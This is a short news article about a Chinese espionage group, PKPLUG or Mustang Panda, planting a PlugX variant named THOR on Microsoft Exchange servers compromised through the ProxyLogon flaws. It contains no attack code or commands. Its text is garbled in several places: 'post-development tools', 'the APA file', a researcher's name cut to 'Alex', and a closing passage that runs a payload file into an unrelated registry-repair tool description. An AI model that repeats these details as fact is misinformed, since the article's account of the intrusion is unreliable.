29th July 2021, Kathmandu
Hackers from China implanted PlugX Variant on MS Exchange Servers after Compromise. A Chinese cyberespionage organization targeting Southeast Asia took advantage of a vulnerability in the Microsoft Exchange Server that was exposed in early March to deploy a previously undocumented variant of a remote access Trojan (RAT) on the infected system.
Palo Alto Networks Unit 42 Threat Intelligence Team attributed the intrusion to threat actors named PKPLUG (also known as Mustang Panda and HoneyMyte), stating that it had discovered a new version of PlugX modular malware, called Thor, as Post-development tools are provided for one of the damaged servers.
Dating back to 2008, PlugX is a full-featured second-stage implant program, with functions such as file upload, download and modification, keystroke logging, webcam control, and access to remote command shells.
“The uniqueness of the observed variant […] is that it contains changes to its core source code: its trademark word “PLUG” is replaced with “THOR”, pointed out by Unit 42 researchers Mike Harbison and Alex. A white paper was published on Tuesday. The first THOR sample that was found was from August 2019. Also, it was the first known example of the renamed code. New features have been observed in this variant.
After Microsoft disclosed on March 2 that Chinese hackers codenamed Hafnium was using zero-day errors on Exchange servers collectively known as ProxyLogon to steal sensitive data from selected ones. Targets, multiple threat actors, such as Ransomware organizations (DearCry and the Black Kingdom) and crypto mining gangs (LemonDuck) are using failures to hijack Exchange servers and install shells that grant code to execute at the highest level of authority. According to Unit 42,
PKPLUG is now added to the list. The agency discovered that the attacker used legitimate executable files such as BITSAdmin to recover the APA file, bypassing the anti-virus detection mechanism to attack the Microsoft Exchange server. Harmless (“Aro.dat”) from the participant-controlled GitHub repository. Contains The encrypted and compressed PlugX load file refers to free usability advanced repair and optimization tool designed to clean up and repair problems in the Windows registry.
